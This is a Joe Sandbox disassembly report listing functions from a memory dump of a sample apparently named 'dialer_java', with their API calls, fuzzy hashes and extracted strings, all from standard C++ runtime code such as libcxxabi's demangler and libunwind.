Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$malloc
String ID: vector[$pixel ve
API String ID: 454241450-4216275618
Opcode ID: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
Instruction ID: 8962fa05dae6e904b55a449b87362e469456aa02567825739cb96e76ec0b64f5
Opcode Fuzzy Hash: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
Instruction Fuzzy Hash: 5541F1B3B05B8582DA18CB0AE44576D7BA5EB58BC0F008631CF8D877A5DF39D492C304

Function 00007FF6E3A70BE5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6E3A70B79
malloc.MSVCRT ref: 00007FF6E3A70C1B
_assert.MSVCRT ref: 00007FF6E3A71E69
malloc.MSVCRT ref: 00007FF6E3A71EB6

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$_assertstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3012236610-3503049562
Opcode ID: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
Instruction ID: db593daddd2a6dc73853689055d36ab80a86cd0e366876f6e1fa09afddfcf59c
Opcode Fuzzy Hash: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
Instruction Fuzzy Hash: 0C411333716B8185EB11CB18E4457A83BA8EB04B91F164235DF9C5B7E1DF39E296C314

Function 00007FF6E3A787F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A78833
realloc.MSVCRT ref: 00007FF6E3A7889B

Strings

ame , xrefs: 00007FF6E3A788BA
> typena, xrefs: 00007FF6E3A788AC
template, xrefs: 00007FF6E3A78848

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: > typena$ame $template
API String ID: 471065373-2892875084
Opcode ID: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
Instruction ID: 997c7322b4345e5eb1e89388e0a3d79814d0cea4d7d9ab527034ac0afa654a27
Opcode Fuzzy Hash: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
Instruction Fuzzy Hash: 05315EF3B06B8582DA299F1AE5852697B65FB98BD0F008531CF8D577A4EF38D592C300

Function 00007FF6E3A7A260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7A298
realloc.MSVCRT ref: 00007FF6E3A7A2F7
realloc.MSVCRT ref: 00007FF6E3A7A37B

Strings

sizeof.., xrefs: 00007FF6E3A7A2AD
&, xrefs: 00007FF6E3A7A31C

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: &$sizeof..
API String ID: 471065373-1098962357
Opcode ID: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
Instruction ID: 2f9b3111cfb4298d42a80a580e40e350f71a5e230c47e9564dd6ddd2d8c0d518
Opcode Fuzzy Hash: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
Instruction Fuzzy Hash: 38316DB7A06B8682DB259F49F4843ADB7A1EB547C4F408531DB8E57795EF3DE0818301

Function 00007FF6E3A7E920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7E970
realloc.MSVCRT ref: 00007FF6E3A7E9CB
realloc.MSVCRT ref: 00007FF6E3A7EA27

Strings

restric, xrefs: 00007FF6E3A7EA38
volatil, xrefs: 00007FF6E3A7E9DC

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction ID: 13f0120b8d0f7e153cea7db1bc62a8f1633d30df72c7be8ed8828c2fea5aa33e
Opcode Fuzzy Hash: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction Fuzzy Hash: 5D4164B3B05B8582DA28CF49E4857697761EB94BC4F008431DB9E577A4EF3DE481C345

Function 00007FF6E3A63D90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6E3A63E24
fflush.MSVCRT ref: 00007FF6E3A63E7E

Strings

libunwind: __libunwind_seh_personality() LanguageHandler returned %d, xrefs: 00007FF6E3A63E62
CCG , xrefs: 00007FF6E3A63E0C
libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p), xrefs: 00007FF6E3A63E05

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflush
String ID: CCG $libunwind: __libunwind_seh_personality() LanguageHandler returned %d$libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p)
API String ID: 497872470-3214979313
Opcode ID: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
Instruction ID: b42495901022e80a0be86a3397a54d90dbac77d32f7a66a9a590c57a49698972
Opcode Fuzzy Hash: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
Instruction Fuzzy Hash: 4B31B223F1864181EB109B2DE4063BD77A5FB85780F044036DE8EA77E5DE3ED4868395

Function 00007FF6E3A7B468 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 38COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6E3A7B4FB

Strings

basic_string, xrefs: 00007FF6E3A7B46D
basi, xrefs: 00007FF6E3A7B4B2
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A7B4EE
starts_with(SV, "basic_"), xrefs: 00007FF6E3A7B4E7

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_string$starts_with(SV, "basic_")
API String ID: 1222420520-1046023109
Opcode ID: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction ID: 45a64119237c5711a2e94320893ddd6db761c6ce84c6cf11e1230f7856c09c02
Opcode Fuzzy Hash: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction Fuzzy Hash: CEF0B4B7B06B5281E6648F0CE482B287BA0EB54B60F508230C52CA2AD0DE2F9192C305

Function 00007FF6E3A7FBC0 Relevance: 7.7, APIs: 5, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E3A7FED0: realloc.MSVCRT ref: 00007FF6E3A7FF80
Part of subcall function 00007FF6E3A7FED0: free.MSVCRT ref: 00007FF6E3A80085

realloc.MSVCRT ref: 00007FF6E3A7FC66
realloc.MSVCRT ref: 00007FF6E3A7FD02
realloc.MSVCRT ref: 00007FF6E3A7FD6A
memcpy.MSVCRT ref: 00007FF6E3A7FD87
realloc.MSVCRT ref: 00007FF6E3A7FE6D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$freememcpy
String ID:
API String ID: 2038854750-0
Opcode ID: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
Instruction ID: 1a6049230c9ec4f51e64b13eb6d08504f780c75308245fbceeae09f3ba257277
Opcode Fuzzy Hash: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
Instruction Fuzzy Hash: 5791DFA3B09A8582EF148B1AD5953786BA1EF59BC4F048431CF4D97399DF2DD1A2C306

Function 00007FF6E3A74F60 Relevance: 7.7, APIs: 5, Instructions: 227COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A74FED
realloc.MSVCRT ref: 00007FF6E3A7506D
malloc.MSVCRT ref: 00007FF6E3A750D6

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$malloc
String ID:
API String ID: 454241450-0
Opcode ID: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
Instruction ID: 505d2339f1156b4b66336e73914fcd0f124f97517417a82a9aae8145dfcf2259
Opcode Fuzzy Hash: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
Instruction Fuzzy Hash: A971E173B06B8582EA258B1AE4857AC7B64EB58BC0F008131CF9D577A5DF3DE5928300

Function 00007FF6E3A757A0 Relevance: 7.7, APIs: 5, Instructions: 217COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A75814
realloc.MSVCRT ref: 00007FF6E3A758DE
realloc.MSVCRT ref: 00007FF6E3A7592D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
Instruction ID: 30e7f453b6cf7ebde9a2ca675e40b80aa614b3352a9c5b3e01e224947e0c9df1
Opcode Fuzzy Hash: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
Instruction Fuzzy Hash: 48719FA3B06B8582EA25DF4AE485369ABA5EB54BC0F008431CB9E57794EF3DE491C305

Function 00007FF6E3A6F040 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A6F0EA

Strings

struct, xrefs: 00007FF6E3A6F042
std, xrefs: 00007FF6E3A6F146
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A6F8CE
Last != First && "Calling back() on empty vector!", xrefs: 00007FF6E3A6F8C7

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$std$struct
API String ID: 2803490479-3902771045
Opcode ID: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
Instruction ID: 4da6536b962a4e795c23a5ea8be121001e9738b790622d8a00a1fe88938e8348
Opcode Fuzzy Hash: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
Instruction Fuzzy Hash: 3831D023B1AA8240EB568B1DD94A7B93A94AF04BC0F054131CF6C9B3D1EF3DE5D28319

Function 00007FF6E3A64D90 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON

Download Yara Rule

Strings

execute once failure in __cxa_get_globals_fast(), xrefs: 00007FF6E3A64DBA
cannot create thread specific key for __cxa_get_globals(), xrefs: 00007FF6E3A64DF0
cannot zero out thread value for __cxa_get_globals(), xrefs: 00007FF6E3A64E1F

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: Once$ExecuteInit
String ID: cannot create thread specific key for __cxa_get_globals()$cannot zero out thread value for __cxa_get_globals()$execute once failure in __cxa_get_globals_fast()
API String ID: 689400697-2130391284
Opcode ID: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
Instruction ID: 5f2f039c8e690c41d06f02b1a986e0b12f765731f479076a40bd6e0fbaa05b3a
Opcode Fuzzy Hash: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
Instruction Fuzzy Hash: 2D219667F2960381F648AB1DEC473B43A95BF95780F800535C90DE26A1DE3FA4D5874A

Function 00007FF6E3A66DB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6E3A66E40

Strings

+, xrefs: 00007FF6E3A66EA5

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: strlen
String ID: +
API String ID: 39653677-2126386893
Opcode ID: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
Instruction ID: 37b93a9ddb6cf17e369ee1a27ff1aa1d5aa54e4021d620774f5874012eb79ea8
Opcode Fuzzy Hash: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
Instruction Fuzzy Hash: 7751D4A372C2828BE7348A2DE05177EBF90EB41754F044139DB9A97AD1CF2EE5808B05

Function 00007FF6E3A817D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6E3A81860

Strings

+, xrefs: 00007FF6E3A818C5

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: strlen
String ID: +
API String ID: 39653677-2126386893
Opcode ID: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
Instruction ID: 84325c02c14129f6d84bf122a6e08befb943ab8302e1360ed43099ea849684d7
Opcode Fuzzy Hash: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
Instruction Fuzzy Hash: 8751A563B1C2C24BE7748A2DD05A77EBF90EB41794F044138DB9A97AC1DF2DE5818B06

Function 00007FF6E3A68350 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6E3A683AA
RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF6E3A684FA

Strings

libunwind: __unw_init_local(cursor=%p, context=%p), xrefs: 00007FF6E3A683D0
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6E3A683A3

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: CaptureContextgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_init_local(cursor=%p, context=%p)
API String ID: 2386080382-2955335536
Opcode ID: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
Instruction ID: 32784c8dabd587eb1e3ef824426f6a1f49fa14c0f655795e5a89229978bb557a
Opcode Fuzzy Hash: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
Instruction Fuzzy Hash: 75611222918AD092F32A4B2CE5067F5B3B4FFA5355F046211DFD952261FF3AA6E6C340

Function 00007FF6E3A81336 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6E3A813A0
memset.MSVCRT ref: 00007FF6E3A81431
fputc.MSVCRT ref: 00007FF6E3A814A9

Strings

0, xrefs: 00007FF6E3A81451

Memory Dump Source

